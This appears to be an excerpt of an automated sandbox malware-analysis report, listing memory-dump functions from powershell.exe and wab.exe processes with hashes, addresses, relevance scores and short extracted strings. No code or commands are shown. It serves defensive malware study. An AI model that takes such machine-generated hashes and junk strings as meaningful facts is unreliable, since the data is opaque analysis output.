Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 643bf0e97f159587f5262ec34a935afc8a4d7e090ceb644cab11d729179be530
Instruction ID: d05b47a74562f223c5d82b5fe84311b7614c29f7690bb998bc77c8e0895ddd92
Opcode Fuzzy Hash: 643bf0e97f159587f5262ec34a935afc8a4d7e090ceb644cab11d729179be530
Instruction Fuzzy Hash: 251136B27141118BCB119668EC026FEF7929BD1315F24C43BDA02CB782DF329822C794

Uniqueness

Uniqueness Score: -1.00%

Function 074512B0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cba8de6db9ebd2ad1c13bfd8aa224a1740713e72272dadb762bc7e9aba16f24
Instruction ID: 3a66339f1f778d8714db64417813f2ddf18c842efacceae902bf20074d28f498
Opcode Fuzzy Hash: 4cba8de6db9ebd2ad1c13bfd8aa224a1740713e72272dadb762bc7e9aba16f24
Instruction Fuzzy Hash: 91012F7630021A9BDB2459AAD4002FBB79A9FC1262F14843BE949CA742DA32C846C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0489B2F4 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2011140790.0000000004890000.00000040.00000800.00020000.00000000.sdmp, Offset: 04890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 016ba262dccfdd30d7ed302b259f1590b472c88d4f5967e4a6598465257bd0a6
Instruction ID: fdfdf7a8525acffbada9873364d3f3cf7a6d294ac5c5f20ae04234f7d1ec416a
Opcode Fuzzy Hash: 016ba262dccfdd30d7ed302b259f1590b472c88d4f5967e4a6598465257bd0a6
Instruction Fuzzy Hash: D411E934A00209EFDF05CF98D884A9DBBF2FF88314F288558E405AB361C771AD82CB40

Uniqueness

Uniqueness Score: -1.00%

Function 02C9D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2010913175.0000000002C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c9d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7e71c594dcaed32c50644d5b7c911eed8e523284c5da017ef9f082c12288ec
Instruction ID: 219cea8c87f7652c258bae82424a39be9f7378aec7ae89ed42462370daefd905
Opcode Fuzzy Hash: 3d7e71c594dcaed32c50644d5b7c911eed8e523284c5da017ef9f082c12288ec
Instruction Fuzzy Hash: 4B01F7710043449AEB106A16CCC8B67FFD8DF91325F08C559EC4A1B242C7799941C7F1

Uniqueness

Uniqueness Score: -1.00%

Function 02C9D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2010913175.0000000002C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c9d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c96d9ccbe1dea53bbe740f983dba5414d9781f54e6dea593e05ee80e2a5c6d
Instruction ID: 02f613db43b2dd8c7b9676f136fc633cf1e3793fd7ee03c756c933349f76316f
Opcode Fuzzy Hash: d7c96d9ccbe1dea53bbe740f983dba5414d9781f54e6dea593e05ee80e2a5c6d
Instruction Fuzzy Hash: 53F0C272004344AEEB109E15CC88B63FF98EB81734F18C19AED491A286C7799980CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 07452747 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f078f5fd5ab7569ff1ca8ac85c225d3adaae87c2679821e82064c7e1fb82c518
Instruction ID: 5029b94e8689269d353b699cc487c45aebdc49ead7d7a0b901707ef9d38443bf
Opcode Fuzzy Hash: f078f5fd5ab7569ff1ca8ac85c225d3adaae87c2679821e82064c7e1fb82c518
Instruction Fuzzy Hash: 5EB012301051404FC202CB20C891400BB209F82104319C0CA94448B253CB23DD03C700

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02C9DAC0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2010913175.0000000002C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2c9d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f91439a38c45096b0d8142576bf9772275e680639f29cb02b36a919eabb9e280
Instruction ID: c4adad07d78b5382440000e954b6d34684e6cf56adec046ff5850cda7d96c950
Opcode Fuzzy Hash: f91439a38c45096b0d8142576bf9772275e680639f29cb02b36a919eabb9e280
Instruction Fuzzy Hash: 9E2124B16042449FDB04EF18D988B26BBA9EBD4724F24C66DD50B6B641C339D406C662

Uniqueness

Uniqueness Score: -1.00%

Function 0745B510 Relevance: 21.7, Strings: 17, Instructions: 497COMMON

Download Yara Rule

Strings

4'qq, xrefs: 0745B7BC
$qq, xrefs: 0745B94E
4'qq, xrefs: 0745B7C8
84bl, xrefs: 0745B57A
$qq, xrefs: 0745B999
4'qq, xrefs: 0745B9C7
84bl, xrefs: 0745B570
4'qq, xrefs: 0745B9D3
$qq, xrefs: 0745B736
4'qq, xrefs: 0745B595
$qq, xrefs: 0745B78B
$qq, xrefs: 0745BABE
tPqq, xrefs: 0745B5DF
4'qq, xrefs: 0745B589
$qq, xrefs: 0745B9A9
tPqq, xrefs: 0745B5EB
$qq, xrefs: 0745B79B

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: 4'qq$4'qq$4'qq$4'qq$4'qq$4'qq$84bl$84bl$tPqq$tPqq$$qq$$qq$$qq$$qq$$qq$$qq$$qq
API String ID: 0-2218257937
Opcode ID: 7658aad7563d74d7e15b24606ffb29b18c37fc92399f8b763e10ec0dbab23e48
Instruction ID: 87202d45aacb5552d501a91a92893d6da90e9fa58f69da31cf62ca3d2912d2d9
Opcode Fuzzy Hash: 7658aad7563d74d7e15b24606ffb29b18c37fc92399f8b763e10ec0dbab23e48
Instruction Fuzzy Hash: 3202BFF1B1421ADFCB258E69C4446EBB7A2EF86311F24C46BDC498B356DB31D842CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0745EE55 Relevance: 10.2, Strings: 8, Instructions: 194COMMON

Download Yara Rule

Strings

$qq, xrefs: 0745EEAD
XRvq, xrefs: 0745EE91
XRvq, xrefs: 0745EFD5
tPqq, xrefs: 0745EF40
tPqq, xrefs: 0745EF34
84bl, xrefs: 0745EEE9
XRvq, xrefs: 0745EFC5
84bl, xrefs: 0745EEDF

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: 84bl$84bl$XRvq$XRvq$XRvq$tPqq$tPqq$$qq
API String ID: 0-333839873
Opcode ID: 6e1f1407579b5db0fcccc1ffa5c9efc9c6027c0a85440ab2ec6e970a6b06c648
Instruction ID: f1db3944f965281847ed625489c06223559d4f0e15116418b6d756da4f9cdadf
Opcode Fuzzy Hash: 6e1f1407579b5db0fcccc1ffa5c9efc9c6027c0a85440ab2ec6e970a6b06c648
Instruction Fuzzy Hash: 276106B1714216EFCB149B68C4416EAFBE2AF89311F64C46AEC059F352CB31DD46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07457C48 Relevance: 10.2, Strings: 8, Instructions: 188COMMON

Download Yara Rule

Strings

$qq, xrefs: 07457DDA
$qq, xrefs: 07457DAF
Zl, xrefs: 07457E2B
$qq, xrefs: 07457DE6
tPqq, xrefs: 07457CF8
tPqq, xrefs: 07457CEC
Zl, xrefs: 07457E1D
$qq, xrefs: 07457C5C

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: tPqq$tPqq$$qq$$qq$$qq$$qq$Zl$Zl
API String ID: 0-3340406814
Opcode ID: a9d9912f1ca5ff31c5f0e6c8bd6c342c1cc844846f1471ec63a88e8fb9850f27
Instruction ID: 21d777ece1e4bdf887f86644454500275932b078c7a34e3aa504b30d44a59de8
Opcode Fuzzy Hash: a9d9912f1ca5ff31c5f0e6c8bd6c342c1cc844846f1471ec63a88e8fb9850f27
Instruction Fuzzy Hash: 11516CB17043169FDB264A69C805BBBBBA2AFC1311F18C47BDD558B382CB35D845C791

Uniqueness

Uniqueness Score: -1.00%

Function 0745E4E6 Relevance: 9.0, Strings: 7, Instructions: 203COMMON

Download Yara Rule

Strings

4'qq, xrefs: 0745E6D0
84bl, xrefs: 0745E5A3
84bl, xrefs: 0745E5AD
tPqq, xrefs: 0745E5F5
$qq, xrefs: 0745E543
tPqq, xrefs: 0745E601
4'qq, xrefs: 0745E6DC

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: 4'qq$4'qq$84bl$84bl$tPqq$tPqq$$qq
API String ID: 0-2629238595
Opcode ID: 598329049f6bce82e0e7386f9027f2fd286ff6331841466cce892157d3c7ebae
Instruction ID: 45f6f5c23dfeb38b917c9c8baeeb60704250682e21d008fae593ddbdac1666dd
Opcode Fuzzy Hash: 598329049f6bce82e0e7386f9027f2fd286ff6331841466cce892157d3c7ebae
Instruction Fuzzy Hash: AA61E8B171422A9FDF158E64C4046FBBBA2AF89301F548867ED055F382DB31DE51C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0745AF40 Relevance: 7.6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

Strings

$qq, xrefs: 0745AFC7
$qq, xrefs: 0745AF93
$qq, xrefs: 0745AFD7
$qq, xrefs: 0745AF77
$qq, xrefs: 0745AFBB
$qq, xrefs: 0745AFE3

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: $qq$$qq$$qq$$qq$$qq$$qq
API String ID: 0-1822695862
Opcode ID: 51e3313e7a01685bf02a244cd5879acf2403cd3caa093476863bd61a3c8ea211
Instruction ID: 429864e2a5b1aac3e779b73008698c64b6ccc10f473874bd3fc37606b39f397a
Opcode Fuzzy Hash: 51e3313e7a01685bf02a244cd5879acf2403cd3caa093476863bd61a3c8ea211
Instruction Fuzzy Hash: D43101F3708203CBDB254A6588516F7FBA1EBC6211B24C57BCC568B243DE35C846D352

Uniqueness

Uniqueness Score: -1.00%

Function 07457628 Relevance: 6.4, Strings: 5, Instructions: 138COMMON

Download Yara Rule

Strings

$ak, xrefs: 074577CC
,Sdl, xrefs: 074576B9
,Sdl, xrefs: 074576AD
xSdl, xrefs: 0745767B
p5Tk, xrefs: 0745769F

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: $ak$,Sdl$,Sdl$p5Tk$xSdl
API String ID: 0-548817480
Opcode ID: 4e50edd118f15d5319c31fd28e537aa4677d8ed20637ec09d80632689fb15220
Instruction ID: 3811100da103ef0ec7f20d9140b646b7b4803f15bd910617c83d9e0efb0e1976
Opcode Fuzzy Hash: 4e50edd118f15d5319c31fd28e537aa4677d8ed20637ec09d80632689fb15220
Instruction Fuzzy Hash: C94128B1A043159FCB129A6C88067E7BFE69F86321F14C57BD909DB342DA71D841C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0745BB60 Relevance: 5.5, Strings: 4, Instructions: 477COMMON

Download Yara Rule

Strings

(oqq, xrefs: 0745BC56
(oqq, xrefs: 0745BF89
(oqq, xrefs: 0745BC46
(oqq, xrefs: 0745BF99

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: (oqq$(oqq$(oqq$(oqq
API String ID: 0-3701351494
Opcode ID: 549fb454e6e8b119eb1134d1636fd5012c63f1a951c8f146b777626cb09a2fd9
Instruction ID: 5b34b751da28d24cf5fb7983d388583fe0284f3695ae2616d208aab4ac183a09
Opcode Fuzzy Hash: 549fb454e6e8b119eb1134d1636fd5012c63f1a951c8f146b777626cb09a2fd9
Instruction Fuzzy Hash: 2CF1DEB1704316DFDB158F68C845BABBBA2EB85311F18C46BE9058B392DB71D841CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0745C24F Relevance: 5.4, Strings: 4, Instructions: 363COMMON

Download Yara Rule

Strings

x.Uk, xrefs: 0745C7E4
-Uk, xrefs: 0745C81B
4'qq, xrefs: 0745C595
4'qq, xrefs: 0745C618

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: 4'qq$4'qq$x.Uk$-Uk
API String ID: 0-2976610322
Opcode ID: 99fd0d2b963cf1374b2d25fd6a87cb8a2d70888a8d4e64a0793e43bcdff909f4
Instruction ID: 489a5a5a1255a9d4da7566f7fd5257e777828243e39e8bd230d09d4e2ace411c
Opcode Fuzzy Hash: 99fd0d2b963cf1374b2d25fd6a87cb8a2d70888a8d4e64a0793e43bcdff909f4
Instruction Fuzzy Hash: BFF16DB0A00215DFDB54CB64C845BEABBB2EF89305F50C0A5D9096F391CB76AD86CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07453700 Relevance: 5.3, Strings: 4, Instructions: 278COMMON

Download Yara Rule

Strings

tPqq, xrefs: 0745383E
84bl, xrefs: 074537DB
84bl, xrefs: 074537E5
tPqq, xrefs: 07453832

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: 84bl$84bl$tPqq$tPqq
API String ID: 0-4260437278
Opcode ID: 09b308c641696b084b2fd21fde20ddc955d0349ff57658f175a11067a82a1039
Instruction ID: 281ccb7a987a0f5c55fd80e37e8027199eb9180065ea14240146919401ac7661
Opcode Fuzzy Hash: 09b308c641696b084b2fd21fde20ddc955d0349ff57658f175a11067a82a1039
Instruction Fuzzy Hash: 5D9147F1B042469BCB189E6988416FBBBE6AFC6354F24C46BDC459F382DB31D841C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07455B10 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(fdl, xrefs: 07455C11
(fdl, xrefs: 07455C8F
(fdl, xrefs: 07455C07
(fdl, xrefs: 07455C85

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: (fdl$(fdl$(fdl$(fdl
API String ID: 0-2428511248
Opcode ID: 72eb56d5a8a99aa9349d28f77a84c79fd55053fbc604f4952c249301553029f4
Instruction ID: 3adc8985615f31d7a3fb979dcc700692c0afd6820e15973c3b95604e22021f97
Opcode Fuzzy Hash: 72eb56d5a8a99aa9349d28f77a84c79fd55053fbc604f4952c249301553029f4
Instruction Fuzzy Hash: 9E716BB0A102059BDB14CF58C455AFAFBF3AF88315F14C46AD815AB356CB32E852CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0745FBAC Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

4'qq, xrefs: 0745FC45
$qq, xrefs: 0745FBE7
$qq, xrefs: 0745FBD7
4'qq, xrefs: 0745FC51

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: 4'qq$4'qq$$qq$$qq
API String ID: 0-2004584679
Opcode ID: cb12e7e1ecc116749cbe39de975676515c1994aef7e507afd111d2f314af31db
Instruction ID: 0718fda8d1c9ecc006998266fa2a9e64a736907bd163334cdbe0ec175c27a61a
Opcode Fuzzy Hash: cb12e7e1ecc116749cbe39de975676515c1994aef7e507afd111d2f314af31db
Instruction Fuzzy Hash: FF31E2B6714119DBCF258E14C4106EA77A2BF85321F20C837DD168F346CB31D949C792

Uniqueness

Uniqueness Score: -1.00%

Function 07459AF8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$qq, xrefs: 07459B0A
$qq, xrefs: 07459B26
$qq, xrefs: 07459B54
$qq, xrefs: 07459B60

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: $qq$$qq$$qq$$qq
API String ID: 0-3704488771
Opcode ID: 18c0450e0924cceb64d655747c3fa43779cf63e8fba51ad26f662c9b1e910f4a
Instruction ID: d0903a2b958566c38c3f42850faa20c07c773295e4cac1dac3bc637db998b610
Opcode Fuzzy Hash: 18c0450e0924cceb64d655747c3fa43779cf63e8fba51ad26f662c9b1e910f4a
Instruction Fuzzy Hash: 512155B1314306EBEB28592A88117B7B796AFC0711F24842BED098B386DE79E841C361

Uniqueness

Uniqueness Score: -1.00%

Function 074503E0 Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

4'qq, xrefs: 0745044B
$qq, xrefs: 0745042A
$qq, xrefs: 07450436
4'qq, xrefs: 07450457

Memory Dump Source

Source File: 00000001.00000002.2016358654.0000000007450000.00000040.00000800.00020000.00000000.sdmp, Offset: 07450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7450000_powershell.jbxd

Similarity

API ID:
String ID: 4'qq$4'qq$$qq$$qq
API String ID: 0-2004584679
Opcode ID: d2d5f126ff5c997dfe09a893ef4ff8b24d523a66b8b05351e6ee197371a979bb
Instruction ID: 59859088e3bf646a010514db4391e8122326d77c3e80be59f0f00f1331983e34
Opcode Fuzzy Hash: d2d5f126ff5c997dfe09a893ef4ff8b24d523a66b8b05351e6ee197371a979bb
Instruction Fuzzy Hash: 6601F7B171D3869FC726163848211A6BFB29FC370172980D7C844CB2A7CE258C458397

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wab.exePID: 7456, Parent PID: 4320COMMON

Execution Graph

Execution Coverage:	11.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	221
Total number of Limit Nodes:	21

Executed Functions

Function 233D30A0 Relevance: 9.3, Strings: 7, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$qq, xrefs: 233D3782
<:z", xrefs: 233D30F2
$qq, xrefs: 233D37AB
$qq, xrefs: 233D37C3
$qq, xrefs: 233D3776
$qq, xrefs: 233D379F
$qq, xrefs: 233D37CF

Memory Dump Source

Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233d0000_wab.jbxd

Similarity

API ID:
String ID: <:z"$$qq$$qq$$qq$$qq$$qq$$qq
API String ID: 0-3744192722
Opcode ID: af05c524246ea2f8914739f649f282a33b434f4ca212ccda1b5838540470be88
Instruction ID: 64c316130e8f742501ff58add8ad51e95df313d50e4fbe7a78fa87046124c62e
Opcode Fuzzy Hash: af05c524246ea2f8914739f649f282a33b434f4ca212ccda1b5838540470be88
Instruction Fuzzy Hash: 49324E71E1061A8BCB14EF75C89059DF7B2BFC9311F51C6A9D409AB214EB34EE85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 233D6228 Relevance: 4.6, Strings: 3, Instructions: 820COMMON

Download Yara Rule

Strings

I[ , xrefs: 233D64D9
('z", xrefs: 233D6456
('z", xrefs: 233D6722

Memory Dump Source

Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233d0000_wab.jbxd

Similarity

API ID:
String ID: ('z"$('z"$I[
API String ID: 0-2551913501
Opcode ID: 7510fb68c830cc1081f4734b9f2c26bbf1a66c1f05553daeba1071e2ca3e28d9
Instruction ID: c3227e179a11d1d8fb747b07949bad2fb89e253fe174727ebd9b79911cba9e1c
Opcode Fuzzy Hash: 7510fb68c830cc1081f4734b9f2c26bbf1a66c1f05553daeba1071e2ca3e28d9
Instruction Fuzzy Hash: C362A276B002188FDB04DB68C990B9DB7F6EF88311F5488A9E416DB355DB35EE45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 233D2379 Relevance: 3.5, Strings: 2, Instructions: 1015COMMON

Download Yara Rule

Strings

<:z", xrefs: 233D30F2
('z", xrefs: 233D2C28

Memory Dump Source

Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233d0000_wab.jbxd

Similarity

API ID:
String ID: ('z"$<:z"
API String ID: 0-2300512769
Opcode ID: f9b3768ec5ea7b9c20d96169d1e6d677641dedf5996a4a37f795c65ee8c37bb6
Instruction ID: 1411e2471be6b5ab66651ab26b6a53643e4455b4286f1827552f0886f8712774
Opcode Fuzzy Hash: f9b3768ec5ea7b9c20d96169d1e6d677641dedf5996a4a37f795c65ee8c37bb6
Instruction Fuzzy Hash: 26924836A002088FCB14DF68C984B4DB7F2FB45311F5984A9E45ADB366DB75EE85CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A7EF10 Relevance: 2.8, Strings: 2, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xuq, xrefs: 00A7F027
$qq, xrefs: 00A7F00E

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID: Xuq$$qq
API String ID: 0-2219112740
Opcode ID: 5ed54d4c8e369b2df84aeb8ef54f2d5d9e3104f35e462572d07e0f20961ed8bf
Instruction ID: 50517c81cfb1f81fd25541767f6748e11da7da0891c8010cba897be978c1c311
Opcode Fuzzy Hash: 5ed54d4c8e369b2df84aeb8ef54f2d5d9e3104f35e462572d07e0f20961ed8bf
Instruction Fuzzy Hash: 31B19134B042188FCB18DBB5985467E7BB7BFC8701B15C96AD406DB399DE34CD028792

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B7B0 Relevance: 2.8, Instructions: 2818COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17fffbec848663ef0954d0fa2589f22aafc4dddab48ad041f63c841b0db82782
Instruction ID: 8b46a6b6503fce8cce735123c48c65047cdacb76878879cb9270adc6c6a7a0a0
Opcode Fuzzy Hash: 17fffbec848663ef0954d0fa2589f22aafc4dddab48ad041f63c841b0db82782
Instruction Fuzzy Hash: 5853F731D10B1A8ADB11EF68C890699F7B1FF99310F51C79AE4587B121FB70AAC5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 233D51E0 Relevance: 1.8, Strings: 1, Instructions: 592
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 233D558F

Memory Dump Source

Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233d0000_wab.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 5916505df84af8b1273d716b7213490f9040b2f9d065f2b43ab0101c9eceaa4e
Instruction ID: 3caefe18db92dabcd68f5fc60088dd11fff61562d9fd34de3740e5eb49d9d5df
Opcode Fuzzy Hash: 5916505df84af8b1273d716b7213490f9040b2f9d065f2b43ab0101c9eceaa4e
Instruction Fuzzy Hash: D722D273E042198FEB11EBA4C98069EBBB6FF85310F2484A9E405EB355DB35DE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 233DB259 Relevance: 1.8, Strings: 1, Instructions: 570COMMON

Download Yara Rule

Strings

I[ , xrefs: 233DB92B

Memory Dump Source

Source File: 00000005.00000002.2871365672.00000000233D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 233D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_233d0000_wab.jbxd

Similarity

API ID:
String ID: I[
API String ID: 0-909448046
Opcode ID: 56c390c0e985bee541a07fc54bb6421a5522e924094e1a8897e61d5b99691825
Instruction ID: 866087b1101a13a7cf222a829145aa5ef10213079ff0f0c4cd9aa7b67724fe8a
Opcode Fuzzy Hash: 56c390c0e985bee541a07fc54bb6421a5522e924094e1a8897e61d5b99691825
Instruction Fuzzy Hash: 92227176E0020D8FDB14DB68C9807DEB7F6EB49311F2884A5E459DB352DB38DE818B91

Uniqueness

Uniqueness Score: -1.00%

Function 00A7EB60 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

|, xrefs: 00A7EEA8

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: fa8580a9ceb3dac0c0c8866e1a4c06c9b783ae9f3b070b90ffe80f5748ef1bee
Instruction ID: 13dbf020287297141e93ca7ef522bf5be333f973376d56606ea8ac25eb1f3347
Opcode Fuzzy Hash: fa8580a9ceb3dac0c0c8866e1a4c06c9b783ae9f3b070b90ffe80f5748ef1bee
Instruction Fuzzy Hash: 11B19F71B002159FDB14DF68C980B6EB7F6AB88310F25C5A9E819DB2A5DB34EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A74AC0 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dec986a5e34f5b5ad2fd8d256a6d70179bbaa8e7979e186801d5c043271820b
Instruction ID: 8f04bd6450af1208d702d2792dfceea95bfb090e84bf102d8e33b2c3e2fe7833
Opcode Fuzzy Hash: 7dec986a5e34f5b5ad2fd8d256a6d70179bbaa8e7979e186801d5c043271820b
Instruction Fuzzy Hash: 7DB15C70E00209CFDB24CFA9DD8579EBBF2AF88354F14C529D459EB294EB749845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A73EA8 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2857440202.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a70000_wab.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86a59c5812f73fd16d704d69ac340e5d340043eeb71a9089ab00969df8358941
Instruction ID: e998306f6b270aceaef907237339896d5299eca18b0b00034f3c2813de766de2
Opcode Fuzzy Hash: 86a59c5812f73fd16d704d69ac340e5d340043eeb71a9089ab00969df8358941
